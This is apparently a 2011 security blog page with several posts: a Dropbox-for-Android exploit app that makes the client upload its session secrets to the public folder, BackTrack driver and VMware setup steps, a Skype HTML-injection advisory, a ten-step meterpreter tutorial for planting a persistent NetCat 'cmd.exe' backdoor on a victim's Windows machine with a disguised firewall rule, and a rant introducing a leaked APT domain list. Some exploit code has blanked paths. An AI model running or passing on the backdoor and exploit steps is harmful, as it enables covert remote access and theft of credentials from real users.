Aug 20, 2011

Dropbox for Android Vulnerability Breakdown

Dropbox vulnerabilities are back and they’re mobile. This week Tyrone Erasmus released a vulnerability in the Android Dropbox client that allows other apps to access its content database allowing attackers to upload your files to the public. I wanted to break down this vulnerability because the lessons learned aren’t that Dropbox is vulnerable, it’s that bad Android programming practices are happening everywhere. Normally we don’t want any other apps to have access to another app’s content provider, so we block them all by default. This is done in a couple of ways. One by restricting the file permissions to only that the apps UID and GID. But in some cases, content providers want to share their information to other places on the Android platform. Take for example an email app that handles attachments.  The content provider should be secured so that other apps can’t access its emails, but if an email has an attachment like an image file, it may want to share that data with other apps like the Gallery Viewer. This is where URI permissions come into play as a way of sharing the content provider in a controlled way. Tyrone took advantage of the permissions allowed on a content provider for the Dropbox app.
Dropbox, for Android versions 1.1.3 and earlier, was setting the permissions of its content provider using the <grant-uri-permission> tag inside AndroidManifest.xml. There’s nothing wrong with that in itself, but grant-uri-permission takes a value of android:path, which is a path to the portions of the device that are allowed to access it. So what happens if that value is “/”?  Yeah. Exactly.

But what’s in this content provider. Lets take a look inside the Dropbox database in /data/app/

You’ll see that the database keeps track of the files that are being synced. What’s interesting to me is the _data field. When you want to add a file to Dropbox, a new record is created that fills in_data with the path of a location to upload. What happens if you were to tell it to upload something sensitive like  /data/data/ The prefs.db contains the secret key and private information you can use to hijack a dropbox session. Telling it to store it into a location in the public folder will upload it to a world readable web address. Something like this:

Lets put this all together into a simple app.
package com.antitree.dropdropbox;

import android.os.Bundle;
import android.content.ContentValues;

public class DropDropBoxActivity extends Activity {

public void onCreate(Bundle savedInstanceState) {

//begin exploit
Uri dropbox_uri = Uri.<em>parse</em>("content://");
ContentValues values = <strong>new</strong> ContentValues();
//path to file to upload. Could also be a file on the sdcard
values.put("_data" , "/data/data/");
//Without this the system won’t think the file needs syncing
values.put("local_modified" , 1);
//Tyrone’s logic flawthat blocks it from being able to be deleted
values.put("_display_name" , "");
values.put("is_favorite" , 1);
values.put("revision" , 0);
values.put("icon" , "page_white_text");
values.put("is_dir" , 0);
values.put("path" , "/Public/prefs.db");
values.put("canon_path" , "/public/prefs.db");
values.put("root" , "dropbox");
values.put("mime_type" , "text/xml");
values.put("thumb_exists" , 0);
values.put("parent_path" , "/Public/");
values.put("canon_parent_path" , "/public/");
this.getContentResolver().update(dropbox_uri, values, null, null);

This an example of what Tyrone created that will add a new record in the Dropbox content provider to tell it to upload the prefs.db to the user’s public folder. This is a pretty boring exploit example but with access to the sdcard and some malware kung-fu, I think you can dream up something much better.
The attack scenario for this vulnerability requires that the attacker have the ability to both install the malicious app on a user that’s using a version less than 1.1.4, and be able to find out the Dropbox ID to retrieve the files. If you’re a Dropbox user, the best way to protect yourself is update to the latest version which came out weeks ago. If you feel like you’ve already been exploited, you’ll need to change your passwords and re-enroll on the device. You may want to consider creating a new account if an attacker already has your user ID.
In the latest version 1.2.3, what’s interesting is that they didn’t change the AndroidManifest.xml permission issue at all. They put the entire app into secure storage. It resolves the issue this time but did it fix the bad programming practices? The take away for all this shouldn’t be that Dropbox has a vulnerability, but rather improper Android development practices are happening even with the larger projects like Dropbox.


If you like my blog, Please Donate Me

Aug 19, 2011

BackTrack 5 r1 patch Wireless Driver rt2800usb

BackTrack 5 R1 contains patched stock kernel wireless drivers with several injection patches applied. Depending on card and setup, these drivers might not suit you.


In some cases we've seen cards using the rt2800usb drivers (such as the AWUS036NH and AWUS036NEH ALFAs) act strange with the BT5R1 kernel. If this happens to you, you can try installing a recent compat-wireless and building it on your own. This specific version will work:
root@bt:~# ln -s /usr/src/linux /lib/modules/
root@bt:~# cd/usr/src/
root@bt:~# wget
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2  
root@bt:~# wget
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2011-07-14 
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch 
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch 
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch 
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch 
root@bt:~# make 
root@bt:~# make install
root@bt:~# reboot


If you like my blog, Please Donate Me
One Dollar $1.00

Installing VMware Tools in BackTrack 5 R1

In case you need to manually install the VMware Tools you first have to prepare your kernel source by issuing the following commands:

root@bt:~# ln -s /usr/src/linux /lib/modules/

  • Next on the VMware Player, we click Virtual Machine -> Install VMware Tools.
  • Now let's quickly setup the VMware Tools by issuing the following commands:

root@bt:~# mkdir /mnt/cdrom; mount /dev/cdrom  /mnt/cdrom
root@bt:~# cp /mnt/cdrom/VMwareTools-<version>.tar.gz /tmp/
root@bt:~# cd /tmp/
root@bt:~# tar zxpf VMwareTools-<version>.tar.gz 
root@bt:~# cd vmware-tools-distrib/
root@bt:~# ./ 

NOTE: After this a series of questions will come, if you are unsure about them just leave them default.
  • We now need to apply some patches to the VMWare kernel module sources before they are built. So:
Before running VMware Tools for the first time, you need to configure it by 
invoking the following command: "/usr/bin/". Do you want 
this program to invoke the command for you now? [yes] no
  • Now we apply the vmware-tools 2.6.39 patch:
root@bt:~# cd /usr/lib/vmware-tools/modules/source/
root@bt:~# for file in *.tar;do tar xpf $file;done
root@bt:~# rm *.tar
root@bt:~# wget
root@bt:~# patch -p1 < vmtools2639.patch 
root@bt:~# for dir in $(ls -l |grep only|awk -F" " '{print $8}' |cut -d"-" -f1);do tar cvf $dir.tar $dir-only;rm -rf $dir-only;done
  • If running in Mac Fusion, the patch won't apply cleanly. Accept the defaults and continue.
  • Continue with the installation to the end, and hopefully all the VMWare modules should compile!
  • bring back your pretty console and reboot:
root@bt:~# fix-splash
root@bt:~# shutdown -r 0


If you like my blog, Please Donate Me
One Dollar $1.00

Backtrack 5 R1 was release

We’re finally ready to release BackTrack 5 R1. This release contains over 120 bug fixes, 30 new tools and 70 tool updates. We will be rolling out some howto’s on our wiki in the next few days, such as VMWare tool installation, alternate compat-wireless setups, etc. The kernel was updated to and includes the relevant injection patches. As usual, please report bugs to us through our redmine ticket system for the fastest response. Don’t forget to also check our forums and wiki (will be updated in the next few days).
We are really happy with this release, and believe that as with every release, this is our best one yet. Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack.
We’ve released Gnome and KDE ISO images for 32 and 64 bit (no arm this release, sorry!), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed.
Lastly, I would like to thank the whole BackTrack team for pulling off the late nights working on this release, as well as Offensive Security for funding all of this stuff. If you need real world Penetration Testing Training – head on over to Offensive-Security and get ready for a bumpy ride!

If you like my blog, Please Donate Me

Aug 18, 2011

Skype - HTML/(Javascript) code injection

|          - Public Security Advisory                    |


Skype Limited -

Affected Software:
Software: Skype
Version: <=

Affected Platforms:
Windows (XP, Vista, 7)

Vulnerability Class:
HTML/(Javascript) code injection

Skype suffers from a persistent code injection vulnerability due to a lack
of input validation and output sanitization of following profile entries:
- home
- office
- mobile

Proof of Concept:
The following HTML codes can be used to trigger the described vulnerability:

--- SNIP ---

Home Phone Number:

Office Phone Number:
<center><i>INJECTION HERE</i></center>

Mobile Phone Number:
<a href="#">INJECTION HERE</a>

--- SNIP ---

For a PoC demonstration see:

An attacker could for example inject HTML/Javascript code. It has not been
verified though, if it's possible to hijack cookies or to attack the underlying
operating system. Attacker could give a try using extern .js files...

Threat Level:
Low - ?

--------- has to validate the input characters and sanitize the output.

Skype hasn't fixed the issue yet.


If you like my blog, Please Donate Me
One Dollar $1.00

Howto: 10 Steps to Use NetCat as a Backdoor in Windows 7 System

Requirements :
2. Meterpreter Script (you can get meterpreter script when successfully compromise victim with selected payload)

Step By Step :

1. The first step you need to gain an access to victim computer and get a meterpreter script for the payload ( I'm using java signed applet from my previous tutorial).
Using NetCat as a Backdoor in Windows
2. The next step you need to upload your NetCat.exe to victim computer by using following command :
upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

upload nc.exe and place it in C:\windows\system32 on victim computer
Using NetCat as a backdoor in Windows system

When it failed to upload(look the picture above), you need to escalate your privilege to system account (view the tutorial privilege escalation here).

3. When upload process successful it will shown like this :

Using NetCat as a Backdoor for windows system

4. The next step we need to configure the registry to make NetCat execute on Windows start up and listening on port 443. We do this by editing the key "HKLM\software\microsoft\windows\currentversion\run".

Enumerate the supplied registry key :
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Using netcat as a backdoor in windows system

5. Then add our NetCat into start up process by running this command :

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

Successful set nc.
6. To check our backdoor autorun process and make sure it already added on autorun list :
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc

Using NetCat as a backdoor in windows system

7. Until this step everything looks okay, for the next step we need to alter the system to allow remote connections through the firewall to our netcat backdoor using netsh command and open port 443 .

run shell command from meterpreter to access command prompt, and then run :
netsh advfirewall firewall add rule name="svchost service" dir=in action=allow protocol=TCP localport=443

Using NetCat as a backdoor in windows system

8. When success add our firewall rule, let's check and make sure our new rule has been added or not by using this command :

netsh firewall show portopening

Using NetCat as a backdoor in windows system

9. Yep everything has been set up so great until this step, now we will run our netcat to try connect to victim computer by running :

nc -v victim_ip_address port
Using NetCat as a backdoor in windows system
10. Let's try our backdoor by restarting the victim computer by using reboot command from meterpreter or shutdown -r -t 00 from windows console and try again to connect using NetCat in step 9.
meterpreter > reboot


C:\windows\system32>shutdown -r -t 00
If our netcat show up a console, then we're successful inject a NetCat backdoor to victim computer.

Countermeasures :

1. When you have activated windows firewall, make sure you also have other personal firewall installed to detect inbound or outbound packet.
Hope it's useful 

If you like my blog, Please Donate Me
One Dollar $1.00

Leak of APT domains

If you want to see all in the list, please go to the Source.
Hello security community.  I’ve compiled the following information for your viewing pleasure. 
 I hope this isn’t as misconstrued as 
This information is by no means the result of a singular analysis of a public Chinese hacking utility.
  At least three distinct threat groups were profiled in Joe Stewart’s analysis; however, no distinction was paid to the actual actors themselves as each was identified by a single means.
  I’m not going to pay homage to the other two actors, as I’m sure the US government and other private entities will have enough problems recovering from this singular data exposure. 
My motivation is purely selfless in nature and I only wish the security community to improve upon what has already been done in this realm. 
 Most of the security community is a fraud and continues to subsist on half-assed analyses and bogus data.
 All information was compiled from open sources and leaked information;
 no customer-based data was used for the analysis.  My sincerest apologies go out to those with ongoing monitoring operations on any of the IP addresses involved. 
These attacks have targeted US and Canadian companies almost exclusively for at least five years; the tools, tactics, and procedures have changed very little during that timeframe and continue to be extremely effective.
Several private companies currently monitor several of these IP addresses for the purpose of supplying stolen information back to the affected companies. 
Stolen data is effectively held hostage for the price of doing business with the company in the know.  On the other hand if you’re lucky, the government will notify you of a breach within six months or less.
  The more likely scenario though is that you will never hear a thing from anyone unless your business is of significant financial importance or you can afford to pay the exorbitant price of the private companies. 
Currently the FBI, AF OSI, and NCIS may provide these ‘notifications’ to affected companies.
 In recent years each branch has become significantly more segmented and isolated as such the overall quality of the information provided to the affected companies has degraded. 
Private entities continue to prosper off of this information to the tune of millions of dollars annually and the affected companies continue to leak money and data to the attackers. 
 I’m not of the mindset to define the attacker or their motivations; however, it’s easy to gleam that the interests are economic in nature and purely financial in motivation. 
 If your company is one outlined in the list below chances are you’re doing business in the Peoples’ Republic of China or plan to shortly. 
Negotiations are a common target for economically motivated hackers and hence email and other relevant information pertaining to contract negotiation data will be taken. 
 If you currently conduct business with the PRC chances are that your organization has knowingly or unknowingly been compromised. 
The domains presented below represent only a small fraction of those that are currently active and reflect only the activities of a singular group of individuals. 
The data has not been truncated and reflects several months of monitoring; non-routable IP addresses and google/yahoo domains are normal for inactive domains.   If you don’t know what to do with the information provide in this leak you deserve to continue to get fucked as you already have been, and you probably will be once again as tactics change.  This should not be construed as the totality of ongoing activity only a harbinger of what’s to come.  I have no allegiances, I make no money, I am not legion.

-RSA Employee #15666

----------------Begin Data----------------

If you like my blog, Please Donate Me
One Dollar $1.00